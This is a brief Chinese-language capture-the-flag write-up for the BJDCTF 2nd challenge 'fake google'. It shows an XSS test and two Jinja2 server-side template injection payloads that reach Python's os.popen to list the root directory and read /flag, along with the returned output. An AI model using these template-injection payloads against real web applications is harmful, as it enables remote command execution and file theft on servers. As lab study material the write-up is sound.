[BJDCTF 2nd]fake google
进入页面:
试了几下发现输入xxx,一般会按的格式显示,
P3's girlfirend is : xxxxx
然后猜测会不会执行代码,发现可以执行
<script>alert(1);</script>
发现输出P3's girlfirend is : xxxxx的页面注释有一句话,师傅把点告诉我们了:ssti注入
<!--ssssssti & a little trick -->
题解就很明显了:因为师傅下手轻了,所以没什么过滤
payload:看一下根目录,回显了flag在这根目录
?name=
{% for c in [].__class__.__base__.__subclasses__() %}
{%if%20c.__name__=='catch_warnings'%27'%}
{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}
{%endif%}
{% endfor %}
P3's girlfirend is : app bd_build bin boot dev etc flag home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
payload:查看flag,得到flag
?name=
{% for c in [].__class__.__base__.__subclasses__() %}
{%if%20c.__name__=='catch_warnings'%27'%}
{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()")}}
{%endif%}
{% endfor %}
